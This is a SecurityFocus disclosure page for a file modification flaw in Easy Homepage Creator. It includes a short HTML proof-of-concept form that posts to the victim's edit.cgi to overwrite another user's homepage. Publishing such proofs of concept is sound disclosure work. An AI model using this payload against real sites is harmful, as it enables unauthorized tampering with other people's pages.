Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Ben Chivers Easy Homepage Creator File Modification Vulnerability

The following proof of concept was provided by Arek Suroboyo <ar3su@yahoo.com>:

<html><center>
<h1>Easy Homepage Creator Vulnerability</h1>
<table border=0 cellpadding=2 cellspacing=1 width="90%">
<FORM method="POST" name=edit action="http://victim/homepage/edit.cgi">
Username: <input name="username"><br>
You can edit other user homepage below :
<textarea rows="17" id="homepage_edit" name="homepage_edit" cols="88">
Please type your messages in here.
</textarea>
<tr>
<td class=top>
<input class=button type="submit" value="Edit Homepage" name="edit_homepage"></td>
</tr>
</FORM>
</table>
</html>







 

Privacy Statement
Copyright 2008, SecurityFocus